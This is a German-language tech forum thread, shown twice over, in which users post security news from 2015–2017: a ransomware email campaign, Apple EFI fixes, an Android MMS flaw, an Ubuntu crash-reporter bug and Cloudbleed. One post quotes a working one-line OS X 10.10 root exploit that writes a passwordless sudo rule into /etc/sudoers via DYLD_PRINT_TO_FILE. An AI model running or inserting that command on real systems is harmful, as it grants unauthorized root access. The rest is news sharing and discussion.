Aktuelle Sicherheitslücken

mr.nice.

differential image maker

Registered: Jun 2004
Location: Wien
Posts: 6454

26.06.2015 - 10:58

Momentan ist verstärkt im deutschsprachigen Raum ein Ransomware Trojaner im Umlauf dessen Erkennungsrate noch relativ niedrig ist, meist als Email-Attachment getarnt:

https://www.virustotal.com/de/file/...b76e8/analysis/

noir

Overclocking Team Member

Registered: Dec 2007
Location: Salzburg/OÖ
Posts: 2311

26.06.2015 - 13:13

naja
Ausgleich von Inkassoabteilung --> hääääää
sowas landet bei mir sowieso sofort im Kübel
wenn es überhaupt durch den Spamfilter durchgeht

mr.nice.

differential image maker

Registered: Jun 2004
Location: Wien
Posts: 6454

01.07.2015 - 13:30

Apple EFI-Update schließt Sicherheitslücken CVE-2015-3692, CVE-2015-3693:

https://support.apple.com/de-de/HT204934

Luka

Administrator
...

Registered: Nov 2006
Location: Mödling
Posts: 206

22.07.2015 - 11:37

OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability | SektionEins GmbH

The DYLD_PRINT_TO_FILE environment variable can be used for local privilege escalation in OS X Yosemite.

Link: www.sektioneins.de

So einfach bekommt man Root-Rechte auf OS X 10.10:

Zitat
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Quelle: numinit auf reddit.com

Luka

Administrator
...

Registered: Nov 2006
Location: Mödling
Posts: 206

27.07.2015 - 21:44

Android-Smartphones über Kurznachrichten angreifbar

95 Prozent aller Android-Smartphones sollen sich durch "die Mutter aller Android-Schwachstellen" attackieren lassen. Angreifer können die Geräte unbemerkt durch eine MMS-Nachricht in eine Wanze verwandeln.

Link: www.heise.de

wergor

connoisseur de mimi

Registered: Jul 2005
Location: vulkanland
Posts: 4095

20.12.2016 - 14:40

Reliably compromising Ubuntu desktops by attacking the crash reporter

In this post I’ll describe how I found a remote code execution bug in Ubuntu Desktop which affects all default installations >= 12.10 (Quantal). The bug allows for reliable code injection …

Link: donncha.is

Lord Wyrm

topquote owner since '17

Registered: Jan 2005
Location: wean
Posts: 1325

24.02.2017 - 11:37

Cloudbleed

Ein T-Shirt als Bug Bounty - Speicherleck: Cloudflare verteilt private Daten übers Internet - Golem.de

Durch einen Bug im HTML-Parser des CDN-Anbieters Cloudflare verteilte dieser private Nachrichten von Datingbörsen, Passwörter und interne Keys über unzählige Webseiten. - Ein T-Shirt als Bug Bounty
Link: www.golem.de

1139 - cloudflare: Cloudflare Reverse Proxies are Dumping Uninitialized Memory - project-zero - Monorail
Link: bugs.chromium.org

Incident report on memory leak caused by Cloudflare parser bug

Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare. It turned out that in some unusual circumstances, which I’ll detail below, our edge

Link: blog.cloudflare.com

GitHub - pirate/sites-using-cloudflare: List of domains using Cloudflare (potentially affected by the CloudBleed HTTPS traffic leak)

sites-using-cloudflare - :broken_heart: List of domains using Cloudflare (potentially affected by the CloudBleed HTTPS traffic leak)

Link: github.com

Wiedermal Zeit für nen Passwortwechsel...

Rektal

Here to stay

Registered: Dec 2002
Location: Inside
Posts: 4452

24.02.2017 - 12:06

Zitat
Cloudbleed

Das ist wirklich einer der besten Internet-Bugs seit langem:
- zentral genutzes Service
- broken html parsing gepaart mit buffer overrun/memory leak
- leaks private information on random unrelated requests
- gets data cached on the internets (google, etc.)

Perfekt, besser gehts nicht :bash:

COLOSSUS

Administrator
GNUltra

Registered: Dec 2000
Location: ~
Posts: 12070

24.02.2017 - 12:18

¯\_(ツ)_/¯

Obermotz

Fünfzylindernazi

Registered: Nov 2002
Location: OÖ/RI
Posts: 5262

24.02.2017 - 12:55

Die gehn ma eh schon lange aufn Sack mit ihren deppterten DDOS ReCaptcha Abfragen wenn ich via VPN unterwegs bin..

Smut

takeover &amp; ether

Registered: Feb 2003
Location: VIE
Posts: 16837

24.02.2017 - 14:27

in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten

hat schon einen grund weshalb das kommt.

ja, bitter. incident response machen sie dennoch vorbildlich.

Obermotz

Fünfzylindernazi

Registered: Nov 2002
Location: OÖ/RI
Posts: 5262

24.02.2017 - 14:50

Naja viele Anbieter sind mittlerweile gelistet. Hab eh schon einige durch

wergor

connoisseur de mimi

Registered: Jul 2005
Location: vulkanland
Posts: 4095

24.02.2017 - 15:37

Zitat von Smut
in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten
hat schon einen grund weshalb das kommt.

mit tor gibts auch ständig captcha abfragen. nervt leider

Zitat von Smut
ja, bitter. incident response machen sie dennoch vorbildlich.

true, der report ist auch sehr interessant zu lesen, auch wenn man (wie ich) mit nginx und ragel nix am hut hat.

edit: der einzige für mich relevante anbeiter den ich bis jetzt gefunden habe ist humblebundle.com :/

Smut

takeover &amp; ether

Registered: Feb 2003
Location: VIE
Posts: 16837

24.02.2017 - 15:50

das problem dabei ist halt, dass der website-provider genau diesen schutz vor anonymen angreifern will, wenn er seine seite hinter cloudflare bringt. hat jetzt wenig damit zu tun, dass du VPN verwendest sondern, dass von diesen adressen (auch tor exit nodes) vermehrt automatisierte attacken auf das cloudflare CDN losgehen. und um diese automatismen zu unterbinden haben sie captchas.

wergor

connoisseur de mimi

Registered: Jul 2005
Location: vulkanland
Posts: 4095

24.02.2017 - 18:25

das ist mir schon klar. nervt aber trotzdem

mr.nice. differential image maker Registered: Jun 2004 Location: Wien Posts: 6454	26.06.2015 - 10:58 Momentan ist verstärkt im deutschsprachigen Raum ein Ransomware Trojaner im Umlauf dessen Erkennungsrate noch relativ niedrig ist, meist als Email-Attachment getarnt: https://www.virustotal.com/de/file/...b76e8/analysis/
noir Overclocking Team Member Registered: Dec 2007 Location: Salzburg/OÖ Posts: 2311	26.06.2015 - 13:13 naja Ausgleich von Inkassoabteilung --> hääääää sowas landet bei mir sowieso sofort im Kübel wenn es überhaupt durch den Spamfilter durchgeht
mr.nice. differential image maker Registered: Jun 2004 Location: Wien Posts: 6454	01.07.2015 - 13:30 Apple EFI-Update schließt Sicherheitslücken CVE-2015-3692, CVE-2015-3693: https://support.apple.com/de-de/HT204934
Luka Administrator ... Registered: Nov 2006 Location: Mödling Posts: 206	22.07.2015 - 11:37 OS X 10.10 DYLD_PRINT_TO_FILE Local Privilege Escalation Vulnerability \| SektionEins GmbH The DYLD_PRINT_TO_FILE environment variable can be used for local privilege escalation in OS X Yosemite. Link: www.sektioneins.de So einfach bekommt man Root-Rechte auf OS X 10.10: Zitat echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' \| DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s Quelle: numinit auf reddit.com
Luka Administrator ... Registered: Nov 2006 Location: Mödling Posts: 206	27.07.2015 - 21:44 Android-Smartphones über Kurznachrichten angreifbar 95 Prozent aller Android-Smartphones sollen sich durch "die Mutter aller Android-Schwachstellen" attackieren lassen. Angreifer können die Geräte unbemerkt durch eine MMS-Nachricht in eine Wanze verwandeln. Link: www.heise.de
wergor connoisseur de mimi Registered: Jul 2005 Location: vulkanland Posts: 4095	20.12.2016 - 14:40 Reliably compromising Ubuntu desktops by attacking the crash reporter In this post I’ll describe how I found a remote code execution bug in Ubuntu Desktop which affects all default installations >= 12.10 (Quantal). The bug allows for reliable code injection … Link: donncha.is
Lord Wyrm topquote owner since '17 Registered: Jan 2005 Location: wean Posts: 1325	24.02.2017 - 11:37 Cloudbleed Ein T-Shirt als Bug Bounty - Speicherleck: Cloudflare verteilt private Daten übers Internet - Golem.de Durch einen Bug im HTML-Parser des CDN-Anbieters Cloudflare verteilte dieser private Nachrichten von Datingbörsen, Passwörter und interne Keys über unzählige Webseiten. - Ein T-Shirt als Bug Bounty Link: www.golem.de 1139 - cloudflare: Cloudflare Reverse Proxies are Dumping Uninitialized Memory - project-zero - Monorail Link: bugs.chromium.org Incident report on memory leak caused by Cloudflare parser bug Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare. It turned out that in some unusual circumstances, which I’ll detail below, our edge Link: blog.cloudflare.com GitHub - pirate/sites-using-cloudflare: List of domains using Cloudflare (potentially affected by the CloudBleed HTTPS traffic leak) sites-using-cloudflare - :broken_heart: List of domains using Cloudflare (potentially affected by the CloudBleed HTTPS traffic leak) Link: github.com Wiedermal Zeit für nen Passwortwechsel...
Rektal Here to stay Registered: Dec 2002 Location: Inside Posts: 4452	24.02.2017 - 12:06 Zitat Cloudbleed Das ist wirklich einer der besten Internet-Bugs seit langem: - zentral genutzes Service - broken html parsing gepaart mit buffer overrun/memory leak - leaks private information on random unrelated requests - gets data cached on the internets (google, etc.) Perfekt, besser gehts nicht
COLOSSUS Administrator GNUltra Registered: Dec 2000 Location: ~ Posts: 12070	24.02.2017 - 12:18 ¯\_(ツ)_/¯
Obermotz Fünfzylindernazi Registered: Nov 2002 Location: OÖ/RI Posts: 5262	24.02.2017 - 12:55 Die gehn ma eh schon lange aufn Sack mit ihren deppterten DDOS ReCaptcha Abfragen wenn ich via VPN unterwegs bin..
Smut takeover &amp; ether Registered: Feb 2003 Location: VIE Posts: 16837	24.02.2017 - 14:27 in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten hat schon einen grund weshalb das kommt. ja, bitter. incident response machen sie dennoch vorbildlich.
Obermotz Fünfzylindernazi Registered: Nov 2002 Location: OÖ/RI Posts: 5262	24.02.2017 - 14:50 Naja viele Anbieter sind mittlerweile gelistet. Hab eh schon einige durch
wergor connoisseur de mimi Registered: Jul 2005 Location: vulkanland Posts: 4095	24.02.2017 - 15:37 Zitat von Smut in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten hat schon einen grund weshalb das kommt. mit tor gibts auch ständig captcha abfragen. nervt leider Zitat von Smut ja, bitter. incident response machen sie dennoch vorbildlich. true, der report ist auch sehr interessant zu lesen, auch wenn man (wie ich) mit nginx und ragel nix am hut hat. edit: der einzige für mich relevante anbeiter den ich bis jetzt gefunden habe ist humblebundle.com :/
Smut takeover &amp; ether Registered: Feb 2003 Location: VIE Posts: 16837	24.02.2017 - 15:50 das problem dabei ist halt, dass der website-provider genau diesen schutz vor anonymen angreifern will, wenn er seine seite hinter cloudflare bringt. hat jetzt wenig damit zu tun, dass du VPN verwendest sondern, dass von diesen adressen (auch tor exit nodes) vermehrt automatisierte attacken auf das cloudflare CDN losgehen. und um diese automatismen zu unterbinden haben sie captchas.
wergor connoisseur de mimi Registered: Jul 2005 Location: vulkanland Posts: 4095	24.02.2017 - 18:25 das ist mir schon klar. nervt aber trotzdem

Aktuelle Sicherheitslücken

Forum Index > Software > Applications, Apps & Drivers

mr.nice.

noir

mr.nice.

Luka

Luka

wergor

Lord Wyrm

Rektal

COLOSSUS

Obermotz

Smut

Obermotz

wergor

Smut

wergor